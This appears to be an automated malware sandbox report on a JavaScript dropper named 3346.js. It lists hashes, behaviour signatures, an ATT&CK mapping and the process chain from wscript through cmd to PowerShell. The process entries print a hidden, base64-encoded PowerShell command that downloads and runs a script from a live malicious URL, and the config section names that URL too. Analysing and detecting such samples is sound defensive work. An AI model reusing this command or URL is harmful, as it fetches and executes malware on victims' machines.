Analysis

  • max time kernel: 11s
  • max time network: 41s
  • platform: windows7_x64
  • resource: win7v20210410
  • submitted: 11-08-2021 13:25

General

  • Target: 3346.js
  • Size: 530KB
  • MD5: 7e23a9a840725f3431ef5825c6ab6839
  • SHA1: b9f307ac96ded5c42d931f7c4355756164ca0123
  • SHA256: 09eeec589e425f4da6dc1587e49f7f32c17f4c9e026b10c2360e5b3f72699ca7
  • SHA512: 51f027140d19f3b493d91a664d4c8bf2514b38c210f28178948a21d56fcde0ed99a068d7c0d04b9b3012ad03fc5be6e88d8e0f78aeb55bb919a2170a7e47da92

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs
    • ps1.dropper: https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe (PID 1856)
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\3346.js
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\cmd.exe (PID 1492)
      Command line: "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      • Suspicious use of WriteProcessMemory
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1688)
        Command line: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery
    • System Information Discovery (T1082): 1


Downloads

  • memory/1492-59-0x0000000000000000-mapping.dmp
  • memory/1688-60-0x0000000000000000-mapping.dmp
  • memory/1688-61-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp (Filesize: 8KB)
  • memory/1688-62-0x0000000001F80000-0x0000000001F81000-memory.dmp (Filesize: 4KB)
  • memory/1688-63-0x000000001AC10000-0x000000001AC11000-memory.dmp (Filesize: 4KB)
  • memory/1688-65-0x000000001AB94000-0x000000001AB96000-memory.dmp (Filesize: 8KB)
  • memory/1688-64-0x000000001AB90000-0x000000001AB92000-memory.dmp (Filesize: 8KB)
  • memory/1688-66-0x0000000002570000-0x0000000002571000-memory.dmp (Filesize: 4KB)
  • memory/1688-67-0x0000000001FD0000-0x0000000001FD1000-memory.dmp (Filesize: 4KB)
  • memory/1688-68-0x000000001C230000-0x000000001C231000-memory.dmp (Filesize: 4KB)